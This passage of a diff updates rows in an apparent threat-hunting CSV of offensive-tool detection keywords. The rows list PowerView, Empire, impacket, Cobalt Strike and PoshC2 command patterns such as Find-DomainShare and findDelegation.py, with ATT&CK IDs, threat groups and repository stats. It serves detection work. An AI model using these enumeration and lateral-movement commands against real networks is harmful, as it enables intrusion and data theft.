","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*findDelegation.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findgpocomputeradmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-InterestingDomainAcl*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-InterestingDomainAcl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findinterestingdomainsharefile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*find-interestingfile -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - 